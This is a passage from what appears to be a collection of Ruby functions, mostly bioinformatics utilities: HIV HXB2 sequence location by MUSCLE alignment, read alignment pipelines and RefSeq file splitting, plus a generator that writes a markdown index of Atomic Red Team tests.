GATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGATAAGGTGCAGAAAGAATATGCATTCTTTTATAAACTTGATATAGTACCAATAGATAATACCAGCTATAGGTTGATAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATCAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGATGTAGTAATTAGATCTGCCAATTTCACAGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGTATCCGTATCCAGAGGGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATGCCACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACACTCCCATGCAGAATAAAACAATTTATAAACATGTGGCAGGAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACTGGGCTGCTATTAACAAGAGATGGTGGTAATAACAACAATGGGTCCGAGATCTTCAGACCTGGAGGAGGCGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCTGCACGTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGATATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAACAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATAACATGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAATCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTAGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAACTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTATTACAAGCAGCTTATAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTGCTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATGGGGTGGGAGCAGTATCTCGAGACCTAGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTAACAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAAGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTGGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGGTAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCTGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATGCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCACCCAGGAGGTAGAGGTTGCAGTGAGCCAAGATCGCGCCACTGCATTCCAGCCTGGGCAAGAAAACAAGACTGTCTAAAATAATAATAATAAGTTAAGGGTATTAAATATATTTATACATGGAGGTCATAAAAATATATATATTTGGGCTGGGCGCAGTGGCTCACACCTGCGCCCGGCCCTTTGGGAGGCCGAGGCAGGTGGATCACCTGAGTTTGGGAGTTCCAGACCAGCCTGACCAACATGGAGAAACCCCTTCTCTGTGTATTTTTAGTAGATTTTATTTTATGTGTATTTTATTCACAGGTATTTCTGGAAAACTGAAACTGTTTTTCCTCTACTCTGATACCACAAGAATCATCAGCACAGAGGAAGACTTCTGTGATCAAATGTGGTGGGAGAGGGAGGTTTTCACCAGCACATGAGCAGTCAGTTCTGCCGCAGACTCGGCGGGTGTCCTTCGGTTCAGTTCCAACACCGCCTGCCTGGAGAGAGGTCAGACCACAGGGTGAGGGCTCAGTCCCCAAGACATAAACACCCAAGACATAAACACCCAACAGGTCCACCCCGCCTGCTGCCCAGGCAGAGCCGATTCACCAAGACGGGAATTAGGATAGAGAAAGAGTAAGTCACACAGAGCCGGCTGTGCGGGAGAACGGAGTTCTATTATGACTCAAATCAGTCTCCCCAAGCATTCGGGGATCAGAGTTTTTAAGGATAACTTAGTGTGTAGGGGGCCAGTGAGTTGGAGATGAAAGCGTAGGGAGTCGAAGGTGTCCTTTTGCGCCGAGTCAGTTCCTGGGTGGGGGCCACAAGATCGGATGAGCCAGTTTATCAATCCGGGGGTGCCAGCTGATCCATGGAGTGCAGGGTCTGCAAAATATCTCAAGCACTGATTGATCTTAGGTTTTACAATAGTGATGTTACCCCAGGAACAATTTGGGGAAGGTCAGAATCTTGTAGCCTGTAGCTGCATGACTCCTAAACCATAATTTCTTTTTTGTTTTTTTTTTTTTATTTTTGAGACAGGGTCTCACTCTGTCACCTAGGCTGGAGTGCAGTGGTGCAATCACAGCTCACTGCAGCCTCAACGTCGTAAGCTCAAGCGATCCTCCCACCTCAGCCTGCCTGGTAGCTGAGACTACAAGCGACGCCCCAGTTAATTTTTGTATTTTTGGTAGAGGCAGCGTTTTGCCGTGTGGCCCTGGCTGGTCTCGAACTCCTGGGCTCAAGTGATCCAGCCTCAGCCTCCCAAAGTGCTGGGACAACCGGGCCCAGTCACTGCACCTGGCCCTAAACCATAATTTCTAATCTTTTGGCTAATTTGTTAGTCCTACAAAGGCAGTCTAGTCCCCAGCAAAAAGGGGGTTTGTTTCGGGAAAGGGCTGTTACTGTCTTTGTTTCAAACTATAAACTAAGTTCCTCCTAAACTTAGTTCGGCCTACACCCAGGAATGAACAAGGAGAGCTTGGAGGTTAGAAGCACGATGGAATTGGTTAGGTCAGATCTCTTTCACTGTCTGAGTTATAATTTTGCAATGGTGGTTCAAAGACTGCCCGCTTCTGACACCAGTCGCTGCATTAATGAATCGGCCAACGCGCGGGGAGAGGCGGTTTGCGTATTGGGCGCTCTTCCGCTTCCTCGCTCACTGACTCGCTGCGCTCGGTCGTTCGGCTGCGGCGAGCGGTATCAGCTCACTCAAAGGCGGTAATACGGTTATCCACAGAATCAGGGGATAACGCAGGAAAGAACATGTGAGCAAAAGGCCAGCAAAAGGCCAGGAACCGTAAAAAGGCCGCGTTGCTGGCGTTTTTCCATAGGCTCCGCCCCCCTGACGAGCATCACAAAAATCGACGCTCAAGTCAGAGGTGGCGAAACCCGACAGGACTATAAAGATACCAGGCGTTTCCCCCTGGAAGCTCCCTCGTGCGCTCTCCTGTTCCGACCCTGCCGCTTACCGGATACCTGTCCGCCTTTCTCCCTTCGGGAAGCGTGGCGCTTTCTCATAGCTCACGCTGTAGGTATCTCAGTTCGGTGTAGGTCGTTCGCTCCAAGCTGGGCTGTGTGCACGAACCCCCCGTTCAGCCCGACCGCTGCGCCTTATCCGGTAACTATCGTCTTGAGTCCAACCCGGTAAGACACGACTTATCGCCACTGGCAGCAGCCACTGGTAACAGGATTAGCAGAGCGAGGTATGTAGGCGGTGCTACAGAGTTCTTGAAGTGGTGGCCTAACTACGGCTACACTAGAAGGACAGTATTTGGTATCTGCGCTCTGCTGAAGCCAGTTACCTTCGGAAAAAGAGTTGGTAGCTCTTGATCCGGCAAACAAACCACCGCTGGTAGCGGTGGTTTTTTTGTTTGCAAGCAGCAGATTACGCGCAGAAAAAAAGGATCTCAAGAAGATCCTTTGATCTTTTCTACGGGGTCTGACGCTCAGTGGAACGAAAACTCACGTTAAGGGATTTTGGTCATGAGATTATCAAAAAGGATCTTCACCTAGATCCTTTTAAATTAAAAATGAAGTTTTAAATCAATCTAAAGTATATATGAGTAAACTTGGTCTGACAGTTACCAATGCTTAATCAGTGAGGCACCTATCTCAGCGATCTGTCTATTTCGTTCATCCATAGTTGCCTGACTCCCCGTCGTGTAGATAACTACGATACGGGAGGGCTTACCATCTGGCCCCAGTGCTGCAATGATACCGCGAGACCCACGCTCACCGGCTCCAGATTTATCAGCAATAAACCAGCCAGCCGGAAGGGCCGAGCGCAGAAGTGGTCCTGCAACTTTATCCGCCTCCATCCAGTCTATTAATTGTTGCCGGGAAGCTAGAGTAAGTAGTTCGCCAGTTAATAGTTTGCGCAACGTTGTTGCCATTGCTACAGGCATCGTGGTGTCACGCTCGTCGTTTGGTATGGCTTCATTCAGCTCCGGTTCCCAACGATCAAGGCGAGTTACATGATCCCCCATGTTGTGCAAAAAAGCGGTTAGCTCCTTCGGTCCTCCGATCGTTGTCAGAAGTAAGTTGGCCGCAGTGTTATCACTCATGGTTATGGCAGCACTGCATAATTCTCTTACTGTCATGCCATCCGTAAGATGCTTTTCTGTGACTGGTGAGTACTCAACCAAGTCATTCTGAGAATAGTGTATGCGGCGACCGAGTTGCTCTTGCCCGGCGTCAATACGGGATAATACCGCGCCACATAGCAGAACTTTAAAAGTGCTCATCATTGGAAAACGTTCTTCGGGGCGAAAACTCTCAAGGATCTTACCGCTGTTGAGATCCAGTTCGATGTAACCCACTCGTGCACCCAACTGATCTTCAGCATCTTTTACTTTCACCAGCGTTTCTGGGTGAGCAAAAACAGGAAGGCAAAATGCCGCAAAAAAGGGAATAAGGGCGACACGGAAATGTTGAATACTCATACTCTTCCTTTTTCAATATTATTGAAGCATTTATCAGGGTTATTGTCTCATGAGCGGATACATATTTGAATGTATTTAGAAAAATAAACAAATAGGGGTTCCGCGCACATTTCCCCGAAAAGTGCCACCTGACGTCTAAGAAACCATTATTATCATGACATTAACCTATAAAAATAGGCGTATCACGAGGCCCTTTCGTCTCGCGCGTTTCGGTGATGACGGTGAAAACCTCTGACACATGCAGCTCCCGGAGACGGTCACAGCTTGTCTGTAAGCGGATGCCGGGAGCAGACAAGCCCGTCAGGGCGCGTCAGCGGGTGTTGGCGGGTGTCGGGGCTGGCTTAACTATGCGGCATCAGAGCAGATTGTACTGAGAGTGCACCATATGCGGTGTGAAATACCGCACAGATGCGTAAGGAGAAAATACCGCATCAGGCGCCATTCGCCATTCAGGCTGCGCAACTGTTGGGAAGGGCGATCGGTGCGGGCCTCTTCGCTATTACGCCAGGGGAGGCAGAGATTGCAGTAAGCTGAGATCGCAGCACTGCACTCCAGCCTGGGCGACAGAGTAAGACTCTGTCTCAAAAATAAAATAAATAAATCAATCAGATATTCCAATCTTTTCCTTTATTTATTTATTTATTTTCTATTTTGGAAACACAGTCCTTCCTTATTCCAGAATTACACATATATTCTATTTTTCTTTATATGCTCCAGTTTTTTTTAGACCTTCACCTGAAATGTGTGTATACAAAATCTAGGCCAGTCCAGCAGAGCCTAAAGGTAAAAAATAAAATAATAAAAAATAAATAAAATCTAGCTCACTCCTTCACATCAAAATGGAGATACAGCTGTTAGCATTAAATACCAAATAACCCATCTTGTCCTCAATAATTTTAAGCGCCTCTCTCCACCACATCTAACTCCTGTCAAAGGCATGTGCCCCTTCCGGGCGCTCTGCTGTGCTGCCAACCAACTGGCATGTGGACTCTGCAGGGTCCCTAACTGCCAAGCCCCACAGTGTGCCCTGAGGCTGCCCCTTCCTTCTAGCGGCTGCCCCCACTCGGCTTTGCTTTCCCTAGTTTCAGTTACTTGCGTTCAGCCAAGGTCTGAAACTAGGTGCGCACAGAGCGGTAAGACTGCGAGAGAAAGAGACCAGCTTTACAGGGGGTTTATCACAGTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACATTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACAGTGCACCCTTACAATCATTCCATTTGATTCACAATTTTTTTAGTCTCTACTGTGCCTAACTTGTAAGTTAAATTTGATCAGAGGTGTGTTCCCAGAGGGGAAAACAGTATATACAGGGTTCAGTACTATCGCATTTCAGGCCTCCACCTGGGTCTTGGAATGTGTCCCCCGAGGGGTGATGACTACCTCAGTTGGATCTCCACAGGTCACAGTGACACAAGATAACCAAGACACCTCCCAAGGCTACCACAATGGGCCGCCCTCCACGTGCACATGGCCGGAGGAACTGCCATGTCGGAGGTGCAAGCACACCTGCGCATCAGAGTCCTTGGTGTGGAGGGAGGGACCAGCGCAGCTTCCAGCCATCCACCTGATGAACAGAACCTAGGGAAAGCCCCAGTTCTACTTACACCAGGAAAGGC\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln = $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n #refine alignment\n\n if ref =~ /^(\\-+)/\n l1 = l1 - $1.size\n elsif ref =~ /(\\-+)$/\n l2 = l2 + $1.size\n end\n l1 = 0 if l1 < 0\n if (hxb2_l - l2 - 1) >= l1\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n ref_size = ref.size\n sim_count = 0\n (0..(ref_size-1)).each do |n|\n ref_base = ref[n]\n test_base = aln_test[n]\n sim_count += 1 if ref_base == test_base\n end\n similarity = (sim_count/ref_size.to_f*100).round(1)\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n loc_p1 = l1 + 1\n loc_p2 = hxb2_l - l2\n if seq.size != (loc_p2 - loc_p1 + 1)\n indel = true\n elsif aln_test.include?(\"-\")\n indel = true\n end\n return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n else\n return [0,0,0,0,0,0,0]\n end\nrescue\n return [0,0,0,0,\"N\",\"N\"]\nend",
"def reference(path)\n @reference_db = Bio::DB::Fasta::FastaFile.new(path)\n @reference_path = path\n end",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def generate_index!(title_prefix, output_doc_path, only_platform: /.*/)\n result = ''\n result += \"# #{title_prefix} Atomic Tests by ATT&CK Tactic & Technique\\n\"\n\n ATTACK_API.techniques_by_tactic(only_platform: only_platform).each do |tactic, techniques|\n result += \"# #{tactic}\\n\"\n techniques.each do |technique|\n result += \"- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: true, link_new_to_contrib: true)}\\n\"\n ATOMIC_RED_TEAM.atomic_tests_for_technique(technique).each_with_index do |atomic_test, i|\n next unless atomic_test['supported_platforms'].any? {|platform| platform.downcase =~ only_platform}\n\n result += \" - Atomic Test ##{i+1}: #{atomic_test['name']} [#{atomic_test['supported_platforms'].join(', ')}]\\n\"\n end\n end\n result += \"\\n\"\n end\n\n File.write output_doc_path, result\n\n puts \"Generated Atomic Red Team index at #{output_doc_path}\"\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def aref_prefix\n raise NotImplementedError\n end",
"def gtf_file\n\t\t\"#{pre}/transcripts.gtf\"\n\tend",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def parseReferencePath(output)\n if(output.match(/BUILD_PATH=\\s+[Ss]equence/) ||\n output.match(/BUILD_PATH=[Ss]equence/))\n @refPath = \"sequence\"\n\n elsif(output.match(/BUILD_PATH=\\s+\\/data/) ||\n output.match(/BUILD_PATH=\\/data/))\n @refPath = output.slice(/\\/data\\/slx\\/references\\/\\S+/)\n \n # Since reference paths starting with /data/slx/references represent\n # format of reference paths in alkek, change the prefix of these paths\n # to match the file-system structure in ardmore.\n @refPath.gsub!(/\\/data\\/slx\\/references/,\n \"/stornext/snfs5/next-gen/Illumina/genomes\")\n\n elsif(output.match(/BUILD_PATH=\\s+\\/stornext/) ||\n output.match(/BUILD_PATH=\\/stornext/))\n # If LIMS already has correct path corresponding to the file\n # system structure in ardmore, return that path without any\n # modifications.\n @refPath = output.slice(/\\/stornext\\/\\S+/)\n end\n end",
"def step3g_fluctuation_source(path)\n return \"#{path.pathmap('%d')}/nreads.RData\"\nend",
"def open_index_file\n end",
"def get_default_data_processing_ids(io, index_list, lookback=300)\n hash = {}\n index_list.each_pair do |name, index|\n if index.size > 0\n # ^ we cannot quickly retrieve a defaultDataProcessingRef unless there\n # is at least one spectrum/chromatogram to start with. However, if\n # there is no spectrum/chromatogram, then the defaultDataProcessingRef\n # will not be needed either.\n io.bookmark do |io|\n io.pos = index[0] - lookback \n hash[name] = io.read(lookback)[/<#{name}List.*defaultDataProcessingRef=['\"](.*?)['\"]/m, 1]\n end\n end\n end\n hash\n end",
"def sequence_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTCACTCCCAACGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGAGAAGTTAGAAGAAGCCAACAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACATGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACCTGAAAGCGAAAGGGAAACCAGAGGAGCTCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCAGTATTAAGCGGGGGAGAATTAGATCGATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAAAAATATAAATTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTGTTAGAAACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAGTAGCAACCCTCTATTGTGTGCATCAAAGGATAGAGATAAAAGACACCAAGGAAGCTTTAGACAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAAGCACAGCAAGCAGCAGCTGACACAGGACACAGCAATCAGGTCAGCCAAAATTACCCTATAGTGCAGAACATCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTGATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAACACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGAGTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAA